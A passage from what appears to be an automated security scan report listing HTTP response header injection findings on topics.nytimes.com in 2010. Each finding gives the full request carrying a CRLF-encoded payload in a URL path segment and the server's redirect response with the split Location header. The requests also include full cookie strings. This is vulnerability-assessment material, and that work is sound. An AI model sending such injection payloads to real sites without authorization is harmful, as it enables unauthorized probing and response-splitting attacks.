<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.47. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/editorials/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 633c2%0d%0a634021120ae was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/633c2%0d%0a634021120ae/editorials/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/633c2
634021120ae/editorials/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.48. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/editorials/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 5b057%0d%0a7de59d5e87c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/5b057%0d%0a7de59d5e87c/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:41 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/5b057
7de59d5e87c/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.49. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/letters/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 4f8b6%0d%0aedfd03c9e7d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/4f8b6%0d%0aedfd03c9e7d/editorialsandoped/letters/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:17 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/4f8b6
edfd03c9e7d/editorialsandoped/letters/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.50. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/letters/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 5ee1d%0d%0aff2ef789888 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/5ee1d%0d%0aff2ef789888/letters/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:17 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/5ee1d
ff2ef789888/letters/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.51. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/letters/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 37796%0d%0aa3f1fddc26a was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/37796%0d%0aa3f1fddc26a/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:17 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/37796
a3f1fddc26a/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.52. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/columnists/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 69187%0d%0a2bc25511dfe was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/69187%0d%0a2bc25511dfe/editorialsandoped/oped/columnists/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:36 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/69187
2bc25511dfe/editorialsandoped/oped/columnists/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.53. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/columnists/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload dacbc%0d%0a30104000c6c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/dacbc%0d%0a30104000c6c/oped/columnists/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:36 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/dacbc
30104000c6c/oped/columnists/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.54. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/columnists/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload f176e%0d%0a6d9076032fb was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/f176e%0d%0a6d9076032fb/columnists/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:36 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/f176e
6d9076032fb/columnists/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.55. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/columnists/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 95d86%0d%0a19497670268 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/oped/95d86%0d%0a19497670268/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:37 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/95d86
19497670268/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.56. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/columnists/paulkrugman/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload cdd86%0d%0a38aad6d8e1e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/cdd86%0d%0a38aad6d8e1e/editorialsandoped/oped/columnists/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/cdd86
38aad6d8e1e/editorialsandoped/oped/columnists/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.57. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/columnists/paulkrugman/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 8a68b%0d%0a66ffcb46ee5 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/8a68b%0d%0a66ffcb46ee5/oped/columnists/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/8a68b
66ffcb46ee5/oped/columnists/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.58. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/columnists/paulkrugman/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 5d2b0%0d%0aa613315c88b was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/5d2b0%0d%0aa613315c88b/columnists/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/5d2b0
a613315c88b/columnists/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.59. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/columnists/paulkrugman/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 9110f%0d%0af9cc7c13367 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/oped/9110f%0d%0af9cc7c13367/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/9110f
f9cc7c13367/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.60. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 6]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/columnists/paulkrugman/
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload ca88e%0d%0a95b10fb38c5 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/oped/columnists/ca88e%0d%0a95b10fb38c5/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:40 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ca88e 95b10fb38c5/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.61. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/contributors/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload eb712%0d%0a0beb5e0feca was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/eb712%0d%0a0beb5e0feca/editorialsandoped/oped/contributors/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:26 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/eb712 0beb5e0feca/editorialsandoped/oped/contributors/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.62. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/contributors/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 5f651%0d%0a988d28d4d19 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
